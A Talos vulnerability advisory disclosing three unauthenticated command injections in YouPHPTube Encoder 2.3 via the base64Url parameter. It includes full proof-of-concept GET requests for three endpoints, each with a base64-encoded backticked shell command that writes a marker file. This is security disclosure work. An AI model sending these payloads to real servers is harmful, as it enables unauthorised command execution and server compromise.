Talos Vulnerability Report

TALOS-2019-0917

YouPHPTube Encoder base64Url multiple command injections

October 17, 2019
CVE Number

CVE-2019-5127 - CVE-2019-5129

Summary

Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube. Specially crafted web requests can cause commands to be executed on the server. An attacker can send a web request with parameters containing specific parameter to trigger these vulnerabilities, potentially allowing exfiltration of the database or user credentials or even compromise the underlying operating system.

Tested Versions

YouPHPTube Encoder 2.3

Product URLs

https://www.youphptube.com/
https://github.com/YouPHPTube/YouPHPTube-Encoder/

CVSSv3 Score

10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Details

Multiple command injections have been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server.

The following URLs and parameters have been confirmed to suffer from command injections and could be exploited by unauthenticated attackers:

CVE-2019-5127 parameter base64Url in /objects/getImage.php

The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack:

GET /YouPHPTube-Encoder/objects/getImage.php?base64Url=YGVjaG8gMTIzIHwgdGVlIC1hIHRoaXNzeXN0ZW1oYXZlYmVlbmV4cGxvaXRlZDEyMzRg&format=png HTTP/1.1
Host: [HOSTNAME].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOSTNAME].com/YouPHPTubeEncoder/objects/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

CVE-2019-5128 parameter base64Url in /objects/getImageMP4.php

The parameter base64Url in /objects/getImageMP4.php is vulnerable to a command injection attack.

GET /YouPHPTube-Encoder/objects/getImageMP4.php?base64Url=YGVjaG8gMTIzIHwgdGVlIC1hIHRoaXNzeXN0ZW1oYXZlYmVlbmV4cGxvaXRlZDEyMzRg&format=jpg HTTP/1.1
Host: [HOSTNAME].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOSTNAME].com/YouPHPTubeEncoder/objects/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

CVE-2019-5129 parameter base64Url in /objects/getSpiritsFromVideo.php

The parameter base64Url in /objects/getSpiritsFromVideo.php is vulnerable to a command injection attack.

GET /YouPHPTube-Encoder/objects/getSpiritsFromVideo.php?base64Url=YGVjaG8gMTIzIHwgdGVlIC1hIHRoaXNzeXN0ZW1oYXZlYmVlbmV4cGxvaXRlZDEyMzRg&format=jpg HTTP/1.1
Host: [HOSTNAME].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[HOSTNAME].com/YouPHPTubeEncoder/objects/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Timeline

2019-10-16 - Vendor Disclosure
2019-10-16 - Vendor Patched
2019-10-17 - Public Release

Credit

Discovered by Yuri Kramarz of Security Advisory EMEAR.